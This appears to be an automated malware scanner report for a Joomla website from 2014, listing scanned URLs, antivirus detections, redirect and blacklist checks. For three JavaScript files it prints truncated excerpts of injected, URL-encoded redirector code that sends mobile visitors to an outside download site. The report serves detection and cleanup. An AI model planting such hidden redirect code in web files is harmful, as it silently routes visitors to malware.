New scan:

Malware Scanner report for larec-chudes.ru

Malicious/Suspicious/Total urls checked
3/0/8
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://larec-chudes.ru/
200 OK
Content-Length: 34682
Content-Type: text/html
clean
http://larec-chudes.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2
200 OK
Content-Length: 32112
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function JCommentsEvents(){}
function JCommentsInput(){}
function JCommentsIndicator(){this.init();}
function JCommentsForm(id,editor){this.init(id,editor);}
function JCommentsEditor(textarea,resizable){this.init(textarea,resizable);}
function JComments(oi,og,r){this.init(oi,og,r);}

JCommentsEvents.prototype = {
add: function(o,e,f){if(o.addEventListener){o.addEventListener(e,f,false);return true;}else if(o.attachEvent){var r=o.attachEvent("on"+e,f);retu
... 32750 bytes are skipped ...
3%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6E%65%77%62%65%73%74%66%6C%61%73%68%70%6C%61%79%65%72%2E%72%75%2F%6C%3D%33%32%34%31%31%38%31%38%30%37%36%61%31%61%30%61%35%66%30%61%35%30%35%34%31%63%31%65%30%32%34%66%36%37%31%64%35%63%35%65%35%38%36%35%31%64%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E"));

Antivirus reports:

AntiVir
JS/Agent.CB.5
Avast
JS:Redirector-AKA [Trj]
Ikarus
Trojan.JS.Redirector
Comodo
TrojWare.JS.Agent.TC
DrWeb
JS.Redirector.189
Kaspersky
Trojan-Downloader.JS.JScript.cb
Fortinet
JS/Redirector.LLX!tr
NANO-Antivirus
Trojan.Url.IframeB.bmpqel
AVG
HTML/Framer
Norman
Redirector.JB
GData
JS:Redirector-AKA
ESET-NOD32
JS/Redirector.NJG

http://larec-chudes.ru/components/com_jcomments/libraries/joomlatune/ajax.js
200 OK
Content-Length: 8911
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if (!window.jtajax) {
function jtAJAX()
{
this.options = {url: '',type: 'post',nocache: true,data: ''};
this.$ = function(id) {if(!id){return null;}var o=document.getElementById(id);if(!o&&document.all){o=document.all[id];}return o;};
this.extend = function(o, e){for(var k in (e||{}))o[k]=e[k];return o;};
this.encode = function(t){return encodeURIComponent(t);};
this.setup = function(options) {this.options = this.extend(this.options, options);};
this
... 8406 bytes are skipped ...
3%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6E%65%77%62%65%73%74%66%6C%61%73%68%70%6C%61%79%65%72%2E%72%75%2F%6C%3D%33%32%34%31%31%38%31%38%30%37%36%61%31%61%30%61%35%66%30%61%35%30%35%34%31%63%31%65%30%32%34%66%36%37%31%64%35%63%35%65%35%38%36%35%31%64%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E"));

Antivirus reports:

Comodo
TrojWare.JS.Agent.TC

http://larec-chudes.ru/media/system/js/caption.js
200 OK
Content-Length: 6896
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 5353 bytes are skipped ...
3%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6E%65%77%62%65%73%74%66%6C%61%73%68%70%6C%61%79%65%72%2E%72%75%2F%6C%3D%33%32%34%31%31%38%31%38%30%37%36%61%31%61%30%61%35%66%30%61%35%30%35%34%31%63%31%65%30%32%34%66%36%37%31%64%35%63%35%65%35%38%36%35%31%64%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E"));

Antivirus reports:

Comodo
TrojWare.JS.Agent.TC
Norman
ShellCode.V

http://platform.twitter.com/widgets.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://platform.twitter.com/test404page.js
403 Forbidden
Content-Length: 243
Content-Type: application/javascript
clean
http://userapi.com/js/api/openapi.js?20
200 OK
Content-Length: 63942
Content-Type: application/x-javascript
clean
http://counter.rambler.ru/top100.jcn?2385886
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: larec-chudes.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 13 May 2014 10:57:15 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 13 May 2014 10:57:15 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cccfd68099e3167def037fac096ec340=9f68656cd16bec4e3c028c1da12c35f6; path=/
Set-Cookie: virtuemart=9f68656cd16bec4e3c028c1da12c35f6
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: larec-chudes.ru
Referer: http://www.google.com/search?q=larec-chudes.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=larec-chudes.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://larec-chudes.ru/

Result: larec-chudes.ru is not infected or malware details are not published yet.